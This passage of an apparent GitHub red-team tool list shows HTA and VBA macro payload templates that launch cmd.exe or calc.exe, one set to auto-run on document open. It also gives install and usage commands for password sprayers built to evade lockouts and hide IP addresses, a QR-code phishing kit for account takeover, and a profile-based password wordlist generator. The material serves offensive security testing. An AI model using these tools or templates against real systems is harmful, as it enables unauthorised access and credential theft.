4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><strong>Creating payload:</strong></p> <div class="highlight highlight-text-html-basic notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="<html> <body> <script> var c= 'cmd.exe' new ActiveXObject('WScript.Shell').Run(c); </script> </body> </html>"><pre><span class="pl-kos"><</span><span class="pl-ent">html</span><span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">body</span><span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">script</span><span class="pl-kos">></span> <span class="pl-k">var</span> <span class="pl-s1">c</span><span class="pl-c1">=</span> <span class="pl-s">'cmd.exe'</span> <span class="pl-k">new</span> <span class="pl-v">ActiveXObject</span><span class="pl-kos">(</span><span class="pl-s">'WScript.Shell'</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">Run</span><span class="pl-kos">(</span><span class="pl-s1">c</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-kos"></</span><span class="pl-ent">script</span><span class="pl-kos">></span> <span class="pl-kos"></</span><span class="pl-ent">body</span><span class="pl-kos">></span> <span class="pl-kos"></</span><span class="pl-ent">html</span><span class="pl-kos">></span></pre></div> <p dir="auto"><strong>Execute:</strong> Run file</p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>VBA</h3><a id="user-content-vba" class="anchor" aria-label="Permalink: 🔙VBA" href="#vba"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><strong>Creating payload:</strong></p> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub"><pre><span class="pl-v">Sub</span> <span class="pl-en">calc</span>() <span class="pl-v">Dim</span> <span class="pl-s1">payload</span> <span class="pl-v">As</span> <span class="pl-v">String</span> <span class="pl-s1">payload</span> <span class="pl-c1">=</span> <span class="pl-s">"calc.exe"</span> <span class="pl-en">CreateObject</span>(<span class="pl-s">"Wscript.Shell"</span>).<span class="pl-c1">Run</span> <span class="pl-s1">payload</span>,<span class="pl-c1">0</span> <span class="pl-v">End</span> <span class="pl-v">Sub</span></pre></div> <p dir="auto"><strong>Execute:</strong> Set function to Auto_Open() in macro enabled document</p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Initial Access</h1><a id="user-content-initial-access" class="anchor" aria-label="Permalink: Initial Access" href="#initial-access"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/knavesec/CredMaster">CredMaster</a></h3><a id="user-content-credmaster" class="anchor" aria-label="Permalink: 🔙CredMaster" href="#credmaster"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Launch a password spray / brute force attach via Amazon AWS passthrough proxies, shifting the requesting IP address for every authentication attempt. This dynamically creates FireProx APIs for more evasive password sprays.</p> <p dir="auto">CredMaster provides a method of running anonymous password sprays against endpoints in a simple, easy to use tool. The FireProx tool provides the rotating request IP, while the base of CredMaster spoofs all other identifying information.</p> <p dir="auto">Features:</p> <ul dir="auto"> <li>Fully supports all AWS Regions</li> <li>Automatically generates APIs for proxy pass-through</li> <li>Spoofs API tracking numbers, forwarded-for IPs, and other proxy tracking headers</li> <li>Multi-threaded processing</li> <li>Password delay counters & configuration for lockout policy evasion</li> <li>Easily add new plugins</li> <li>Fully anonymous</li> </ul> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/knavesec/CredMaster;cd CredMaster;pip install -r requirements.txt"><pre>git clone https://github.com/knavesec/CredMaster<span class="pl-k">;</span><span class="pl-c1">cd</span> CredMaster<span class="pl-k">;</span>pip install -r requirements.txt</pre></div> <p dir="auto">For full installation instructions see <a href="https://whynotsecurity.com/blog/credmaster/#setup" rel="nofollow">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs} python3 credmaster.py --config config.json"><pre>python3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs} python3 credmaster.py --config config.json</pre></div> <p dir="auto">This tool requires AWS API access keys, a walkthrough on how to acquire these keys can be found here: <a href="https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b" rel="nofollow">https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/423172634-f678cca4-7a53-41e7-9323-51e8efd0e6ba.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjM0LWY2NzhjY2E0LTdhNTMtNDFlNy05MzIzLTUxZThlZmQwZTZiYS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xZmUwZWIzMWJjYmM3NWE2NzZlZWM3MGJkZTc1M2QxNjQ3YWY3MmViY2Y3OTU5YTQxOTg3MWExOTM3MWU1MjQ1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.uPN-W0Xd_kFXzNWGPPhSlLOYeX5V_J_bBQJlnIiiCT0"><img src="https://private-user-images.githubusercontent.com/100603074/423172634-f678cca4-7a53-41e7-9323-51e8efd0e6ba.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjM0LWY2NzhjY2E0LTdhNTMtNDFlNy05MzIzLTUxZThlZmQwZTZiYS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xZmUwZWIzMWJjYmM3NWE2NzZlZWM3MGJkZTc1M2QxNjQ3YWY3MmViY2Y3OTU5YTQxOTg3MWExOTM3MWU1MjQ1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.uPN-W0Xd_kFXzNWGPPhSlLOYeX5V_J_bBQJlnIiiCT0" alt="credmaster" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/knavesec/CredMaster/wiki">https://github.com/knavesec/CredMaster/wiki</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/blacklanternsecurity/TREVORspray">TREVORspray</a></h3><a id="user-content-trevorspray" class="anchor" aria-label="Permalink: 🔙TREVORspray" href="#trevorspray"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">TREVORspray is a modular password sprayer with threading, SSH proxying, loot modules, and more!</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="pip install https://github.com/blacklanternsecurity/TREVORspray"><pre>pip install https://github.com/blacklanternsecurity/TREVORspray</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Recon python3 ./trevorspray --recon evilcorp.com # Enumerate users via OneDrive python3 ./trevorspray --recon evilcorp.com -u emails.txt --threads 10 # Spray against discovered python3 ./trevorspray -u emails.txt -p 'Welcome123' --url https://login.windows.net/b43asdas-cdde-bse-ac05-2e37deadbeef/oauth2/token"><pre><span class="pl-c"><span class="pl-c">#</span> Recon</span> python3 ./trevorspray --recon evilcorp.com <span class="pl-c"><span class="pl-c">#</span> Enumerate users via OneDrive</span> python3 ./trevorspray --recon evilcorp.com -u emails.txt --threads 10 <span class="pl-c"><span class="pl-c">#</span> Spray against discovered</span> python3 ./trevorspray -u emails.txt -p <span class="pl-s"><span class="pl-pds">'</span>Welcome123<span class="pl-pds">'</span></span> --url https://login.windows.net/b43asdas-cdde-bse-ac05-2e37deadbeef/oauth2/token</pre></div> <p dir="auto">For full usage instructions see <a href="https://github.com/blacklanternsecurity/TREVORspray?tab=readme-ov-file#how-to---o365">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/423172625-67c64f6d-527a-4b59-8dd9-b73bc68274f4.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjI1LTY3YzY0ZjZkLTUyN2EtNGI1OS04ZGQ5LWI3M2JjNjgyNzRmNC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1kM2M5NjA5NTA0MmJjNTQzZjMyYzViOGZjMjE4YzE3MmE2ZmVkOTQ3NjJmYTEzMzZiN2M4NTYwMTc4NGJjZDg4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.YQZ3I12_jIbHB1aOb1hE1UK4H_P1cNvlR7u0hIhxUY4"><img src="https://private-user-images.githubusercontent.com/100603074/423172625-67c64f6d-527a-4b59-8dd9-b73bc68274f4.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjI1LTY3YzY0ZjZkLTUyN2EtNGI1OS04ZGQ5LWI3M2JjNjgyNzRmNC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1kM2M5NjA5NTA0MmJjNTQzZjMyYzViOGZjMjE4YzE3MmE2ZmVkOTQ3NjJmYTEzMzZiN2M4NTYwMTc4NGJjZDg4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.YQZ3I12_jIbHB1aOb1hE1UK4H_P1cNvlR7u0hIhxUY4" alt="TREVORspray" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/blacklanternsecurity/TREVORspray">https://github.com/blacklanternsecurity/TREVORspray</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/kgretzky/evilqr">evilqr</a></h3><a id="user-content-evilqr" class="anchor" aria-label="Permalink: 🔙evilqr" href="#evilqr"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Toolkit demonstrating another approach of a QRLJacking attack, allowing to perform remote account takeover, through sign-in QR code phishing.</p> <p dir="auto">It consists of a browser extension used by the attacker to extract the sign-in QR code and a server application, which retrieves the sign-in QR codes to display them on the hosted phishing pages.</p> <p dir="auto">Demo <a href="https://www.youtube.com/watch?v=8pfodWzqMcU" rel="nofollow">video</a></p> <p dir="auto"><strong>Install: (Extension)</strong></p> <p dir="auto">You can load the extension in Chrome, through <code>Load unpacked</code> feature: <a href="https://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/#load-unpacked" rel="nofollow">https://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/#load-unpacked</a></p> <p dir="auto">Once the extension is installed, make sure to pin its icon in Chrome's extension toolbar, so that the icon is always visible.</p> <p dir="auto"><strong>Install: (Server)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/kgretzky/evilqr;cd evilqr/server/;build_run.bat"><pre>git clone https://github.com/kgretzky/evilqr<span class="pl-k">;</span><span class="pl-c1">cd</span> evilqr/server/<span class="pl-k">;</span>build_run.bat</pre></div> <p dir="auto"><strong>Usage:</strong></p> <ol dir="auto"> <li>Run the server by running the built server binary: <code>./server/build/evilqr-server</code></li> <li>Open any of the supported websites in your Chrome browser, with installed <strong>Evil QR</strong> extension:</li> </ol> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="https://discord.com/login https://web.telegram.org/k/ https://whatsapp.com https://store.steampowered.com/login/ https://accounts.binance.com/en/login https://www.tiktok.com/login"><pre class="notranslate"><code>https://discord.com/login https://web.telegram.org/k/ https://whatsapp.com https://store.steampowered.com/login/ https://accounts.binance.com/en/login https://www.tiktok.com/login </code></pre></div> <ol start="3" dir="auto"> <li>Make sure the sign-in QR code is visible and click the <strong>Evil QR</strong> extension icon in the toolbar. If the QR code is recognized, the icon should light up with colors.</li> <li>Open the server's phishing page URL: <code>http://127.0.0.1:35000</code> (default)</li> </ol> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/423172607-00ad78c5-1978-4e59-a522-7e8b9c39b1c3.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjA3LTAwYWQ3OGM1LTE5NzgtNGU1OS1hNTIyLTdlOGI5YzM5YjFjMy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01MjliZTU4NmYzZTZmNmNjZjViMDg4OWVlYTNkZGRhMTYwMDk4ZDEyMTI2MGU0ZDNlOTkxM2YzZDk4NDEzM2VmJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.LavVF9LZlkFYH3JEOSizSu0pgNEGBWcqVtr6p2AdFwA"><img src="https://private-user-images.githubusercontent.com/100603074/423172607-00ad78c5-1978-4e59-a522-7e8b9c39b1c3.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjA3LTAwYWQ3OGM1LTE5NzgtNGU1OS1hNTIyLTdlOGI5YzM5YjFjMy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01MjliZTU4NmYzZTZmNmNjZjViMDg4OWVlYTNkZGRhMTYwMDk4ZDEyMTI2MGU0ZDNlOTkxM2YzZDk4NDEzM2VmJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.LavVF9LZlkFYH3JEOSizSu0pgNEGBWcqVtr6p2AdFwA" alt="evilqr" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://breakdev.org/evilqr-phishing/" rel="nofollow">https://breakdev.org/evilqr-phishing/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/Mebus/cupp">CUPP</a></h3><a id="user-content-cupp" class="anchor" aria-label="Permalink: 🔙CUPP" href="#cupp"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">The most common form of authentication is the combination of a username and a password or passphrase. Passwords can sometimes be guessed profiling the user, such as a birthday, nickname, address, name of a pet or relative, or a common word such as God, love, money or password.</p> <p dir="auto">That is why CUPP was born.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/Mebus/cupp;cd cupp"><pre>git clone https://github.com/Mebus/cupp<span class="pl-k">;</span><span class="pl-c1">cd</span> cupp</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Run in interactive mode python3 ./cupp.py -i"><pre><span class="pl-c"><span class="pl-c">#</span> Run in interactive mode</span> python3 ./cupp.py -i</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/423172603-39ad1c58-de4e-449a-b2d4-a9629d5ab82c.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjAzLTM5YWQxYzU4LWRlNGUtNDQ5YS1iMmQ0LWE5NjI5ZDVhYjgyYy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT02NDdlY2VlNGYxZDQwZGY1ZmRhNTEzNTczY2Q2Y2M0YTliMWI0NjliNzc2YWU0YjNhZmY4MWQzNmNiNTc5NTRlJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.ojCDSk4bT3ngU0K4rrZaolNnqXMAbvHzltaFfxSmmuM"><img src="https://private-user-images.githubusercontent.com/100603074/423172603-39ad1c58-de4e-449a-b2d4-a9629d5ab82c.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjAzLTM5YWQxYzU4LWRlNGUtNDQ5YS1iMmQ0LWE5NjI5ZDVhYjgyYy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT02NDdlY2VlNGYxZDQwZGY1ZmRhNTEzNTczY2Q2Y2M0YTliMWI0NjliNzc2YWU0YjNhZmY4MWQzNmNiNTc5NTRlJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.ojCDSk4bT3ngU0K4rrZaolNnqXMAbvHzltaFfxSmmuM" alt="cupp" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/Mebus/cupp">https://github.com/Mebus/cupp</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://shop.hak5.org/products/bash-bunny" rel="nofollow">Bash Bunny</a></h3><a id="user-content-bash-bunny" class="anchor" aria-label="Permalink: 🔙Bash Bunny" href="#bash-bunny"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 